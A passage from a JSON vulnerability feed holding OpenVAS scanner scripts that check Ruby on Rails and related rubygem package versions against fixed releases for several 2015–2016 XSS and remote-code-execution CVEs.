Ruby on Rails and is\n prone to cross site scripting vulnerability.", "cvss3": {}, "published": "2016-10-13T00:00:00", "type": "openvas", "title": "Ruby on Rails Action View Cross Site Scripting Vulnerability (Linux)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-6316"], "modified": "2020-07-14T00:00:00", "id": "OPENVAS:1361412562310807380", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310807380", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ruby on Rails Action View Cross Site Scripting Vulnerability (Linux)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:rubyonrails:rails\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.807380\");\n script_version(\"2020-07-14T14:33:06+0000\");\n script_cve_id(\"CVE-2016-6316\");\n script_bugtraq_id(92430);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-07-14 14:33:06 +0000 (Tue, 14 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-10-13 14:29:55 +0530 (Thu, 13 Oct 2016)\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_name(\"Ruby on Rails Action View Cross Site Scripting Vulnerability (Linux)\");\n\n script_tag(name:\"summary\", value:\"This host is running Ruby on Rails and is\n prone to cross site scripting vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to the Text declared as\n 'HTML safe' when passed as an attribute value to a tag helper will not have\n quotes escaped which can lead to an XSS attack.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow a remote\n attacker to inject arbitrary web script or HTML via crafted parameters.\");\n\n script_tag(name:\"affected\", value:\"Ruby on Rails 3.x before 3.2.22.3,\n Ruby on Rails 4.x before 4.2.7.1 and\n Ruby on Rails 5.x before 5.0.0.1 on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Ruby on Rails 3.2.22.3 or 4.2.7.1 or\n 5.0.0.1 or later.\");\n\n script_tag(name:\"solution_type\", 
value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://seclists.org/oss-sec/2016/q3/260\");\n script_xref(name:\"URL\", value:\"https://groups.google.com/forum/#!msg/rubyonrails-security/I-VWr034ouk/gGu2FrCwDAAJ\");\n script_xref(name:\"URL\", value:\"http://weblog.rubyonrails.org/2016/8/11/Rails-5-0-0-1-4-2-7-2-and-3-2-22-3-have-been-released\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_rails_consolidation.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"rails/detected\", \"Host/runs_unixoide\");\n exit(0);\n}\n\ninclude( \"version_func.inc\" );\ninclude( \"host_details.inc\" );\n\nif( isnull( port = get_app_port( cpe: CPE ) ) )\n exit( 0 );\n\nif( ! infos = get_app_version_and_location( cpe: CPE, port: port, exit_no_version: TRUE ) )\n exit( 0 );\n\nversion = infos[\"version\"];\nlocation = infos[\"location\"];\n\nVULN = FALSE;\n\nif( version =~ \"^(3\\.)\")\n{\n if( version_is_less( version: version, test_version: \"3.2.22.3\" ) )\n {\n fix = \"3.2.22.3\";\n VULN = TRUE;\n }\n}\n\nelse if( version =~ \"^(4\\.)\" )\n{\n if( version_is_less( version: version, test_version: \"4.2.7.1\" ) )\n {\n fix = \"4.2.7.1\";\n VULN = TRUE;\n }\n}\n\nelse if( version =~ \"^(5\\.)\" )\n{\n if( version_is_less( version: version, test_version: \"5.0.0.1\" ) )\n {\n fix = \"5.0.0.1\";\n VULN = TRUE;\n }\n}\n\nif( VULN )\n{\n report = report_fixed_ver( installed_version: version, fixed_version: fix, install_path: location );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:35:05", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-08-27T00:00:00", "type": "openvas", "title": "Fedora Update for rubygem-actionview FEDORA-2016-0d9890f7b5", "bulletinFamily": 
"scanner", "cvss2": {}, "cvelist": ["CVE-2016-6316"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310809170", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809170", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for rubygem-actionview FEDORA-2016-0d9890f7b5\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809170\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-08-27 05:53:30 +0200 (Sat, 27 Aug 2016)\");\n script_cve_id(\"CVE-2016-6316\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for rubygem-actionview FEDORA-2016-0d9890f7b5\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'rubygem-actionview'\n package(s) 
announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"rubygem-actionview on Fedora 24\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-0d9890f7b5\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/4APXKS7NQ42L26TII23EU4OR5UUM7PGI\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC24\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC24\")\n{\n\n if ((res = isrpmvuln(pkg:\"rubygem-actionview\", rpm:\"rubygem-actionview~4.2.5.2~3.fc24\", rls:\"FC24\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:35:19", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-02-29T00:00:00", "type": "openvas", "title": "Fedora Update for rubygem-activesupport FEDORA-2016-3", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7576"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310807436", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310807436", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for rubygem-activesupport 
FEDORA-2016-3\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.807436\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-02-29 06:24:52 +0100 (Mon, 29 Feb 2016)\");\n script_cve_id(\"CVE-2015-7576\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for rubygem-activesupport FEDORA-2016-3\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'rubygem-activesupport'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"rubygem-activesupport on Fedora 23\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-3\");\n 
script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2016-February/178068.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC23\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC23\")\n{\n\n if ((res = isrpmvuln(pkg:\"rubygem-activesupport\", rpm:\"rubygem-activesupport~4.2.3~3.fc23\", rls:\"FC23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-07-21T21:55:14", "description": "This host is running Ruby on Rails and is\n prone to remote code execution vulnerability.", "cvss3": {}, "published": "2016-10-14T00:00:00", "type": "openvas", "title": "Ruby on Rails Action Pack Remote Code Execution Vulnerability (Linux)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-2098"], "modified": "2020-07-14T00:00:00", "id": "OPENVAS:1361412562310809353", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809353", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ruby on Rails Action Pack Remote Code Execution Vulnerability (Linux)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by 
the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:rubyonrails:rails\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809353\");\n script_version(\"2020-07-14T14:33:06+0000\");\n script_cve_id(\"CVE-2016-2098\");\n script_bugtraq_id(83725);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-07-14 14:33:06 +0000 (Tue, 14 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-10-14 16:40:26 +0530 (Fri, 14 Oct 2016)\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_name(\"Ruby on Rails Action Pack Remote Code Execution Vulnerability (Linux)\");\n\n script_tag(name:\"summary\", value:\"This host is running Ruby on Rails and is\n prone to remote code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to an improper sanitization\n of user supplied inputs to the 'render' method in a controller or view by\n 'Action Pack'.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow a remote\n attacker to control the arguments of the render method in a controller or a view,\n resulting in the possibility of executing arbitrary ruby code.\");\n\n script_tag(name:\"affected\", value:\"Ruby on Rails before 
3.2.22.2,\n Ruby on Rails 4.x before 4.1.14.2 and\n Ruby on Rails 4.2.x before 4.2.5.2 on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Ruby on Rails 3.2.22.2 or 4.1.14.2 or\n 4.2.5.2 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2016/dsa-3509\");\n script_xref(name:\"URL\", value:\"https://groups.google.com/forum/message/raw?msg=rubyonrails-security/ly-IH-fxr_Q/WLoOhcMZIAAJ\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_rails_consolidation.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"ruby/detected\", \"Host/runs_unixoide\");\n exit(0);\n}\n\ninclude( \"version_func.inc\" );\ninclude( \"host_details.inc\" );\n\nif( isnull( port = get_app_port( cpe: CPE ) ) )\n exit( 0 );\n\nif( ! infos = get_app_version_and_location( cpe: CPE, port: port, exit_no_version: TRUE ) )\n exit( 0 );\n\nversion = infos[\"version\"];\nlocation = infos[\"location\"];\n\nVULN = FALSE;\n\nif( version_is_less (version: version, test_version: \"3.2.22.2\" ) )\n{\n fix = \"3.2.22.2\";\n VULN = TRUE;\n}\n\nelse if( version =~ \"^(4\\.1)\" )\n{\n if( version_is_less( version: version, test_version: \"4.1.14.2\" ) )\n {\n fix = \"4.1.14.2\";\n VULN = TRUE;\n }\n}\n\nelse if( version =~ \"^(4\\.2)\" )\n{\n if( version_is_less( version: version, test_version:\"4.2.5.2\" ) )\n {\n fix = \"4.2.5.2\";\n VULN = TRUE;\n }\n}\n\nif(VULN)\n{\n report = report_fixed_ver( installed_version: version, fixed_version: fix, install_path: location );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-31T18:34:54", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-03-17T00:00:00", "type": 
"openvas", "title": "openSUSE: Security Advisory for rubygem-actionview-4_2 (openSUSE-SU-2016:0790-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-2098"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310851240", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851240", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851240\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-03-17 05:11:27 +0100 (Thu, 17 Mar 2016)\");\n script_cve_id(\"CVE-2016-2098\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for rubygem-actionview-4_2 (openSUSE-SU-2016:0790-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'rubygem-actionview-4_2'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for rubygem-actionview-4_2 fixes the following issues:\n\n - CVE-2016-2098: rubygem-actionpack: Possible remote code execution\n vulnerability in Action Pack (boo#968849)\");\n\n script_tag(name:\"affected\", value:\"rubygem-actionview-4_2 on openSUSE Leap 42.1\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2016:0790-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", 
re:\"ssh/login/release=openSUSELeap42\\.1\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.1\") {\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.1-rubygem-actionview-4_2\", rpm:\"ruby2.1-rubygem-actionview-4_2~4.2.4~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.1-rubygem-actionview-doc-4_2\", rpm:\"uby2.1-rubygem-actionview-doc-4_2~4.2.4~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:48", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-03-18T00:00:00", "type": "openvas", "title": "Fedora Update for rubygem-actionview FEDORA-2016-3954061", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-2098"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310807706", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310807706", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for rubygem-actionview FEDORA-2016-3954061\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.807706\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-03-18 05:31:39 +0100 (Fri, 18 Mar 2016)\");\n script_cve_id(\"CVE-2016-2098\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for rubygem-actionview FEDORA-2016-3954061\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'rubygem-actionview'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"rubygem-actionview on Fedora 22\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-3954061\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2016-March/179025.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC22\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC22\")\n{\n\n if ((res = isrpmvuln(pkg:\"rubygem-actionview\", rpm:\"rubygem-actionview~4.2.0~5.fc22\", rls:\"FC22\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:04", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-03-18T00:00:00", "type": "openvas", "title": "Fedora Update for rubygem-actionpack FEDORA-2016-3954061", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-2098"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310807704", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310807704", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for rubygem-actionpack FEDORA-2016-3954061\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.807704\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-03-18 05:31:22 +0100 (Fri, 18 Mar 2016)\");\n script_cve_id(\"CVE-2016-2098\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for rubygem-actionpack FEDORA-2016-3954061\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'rubygem-actionpack'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"rubygem-actionpack on Fedora 22\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-3954061\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2016-March/179026.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC22\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC22\")\n{\n\n if ((res = isrpmvuln(pkg:\"rubygem-actionpack\", rpm:\"rubygem-actionpack~4.2.0~4.fc22\", rls:\"FC22\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-07-21T21:53:52", "description": "This host is running Ruby on Rails and is\n prone to remote code execution vulnerability.", "cvss3": {}, "published": "2016-10-14T00:00:00", "type": "openvas", "title": "Ruby on Rails Action Pack Remote Code Execution Vulnerability (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-2098"], "modified": "2020-07-14T00:00:00", "id": "OPENVAS:1361412562310809352", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809352", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ruby on Rails Action Pack Remote Code Execution Vulnerability (Windows)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:rubyonrails:rails\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809352\");\n script_version(\"2020-07-14T14:33:06+0000\");\n script_cve_id(\"CVE-2016-2098\");\n script_bugtraq_id(83725);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-07-14 14:33:06 +0000 (Tue, 14 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-10-14 18:40:26 +0530 (Fri, 14 Oct 2016)\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_name(\"Ruby on Rails Action Pack Remote Code Execution Vulnerability (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is running Ruby on Rails and is\n prone to remote code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to an improper sanitization of\n user supplied inputs to the 'render' method in a controller or view by\n 'Action Pack'.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow a remote\n attacker to control the arguments of the render method in a controller or a view,\n resulting in the possibility of executing arbitrary ruby code.\");\n\n script_tag(name:\"affected\", value:\"Ruby on Rails before 3.2.22.2,\n Ruby on Rails 4.x before 4.1.14.2 and\n Ruby on Rails 4.2.x before 4.2.5.2 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Ruby on Rails 3.2.22.2 or 4.1.14.2 or\n 4.2.5.2 or 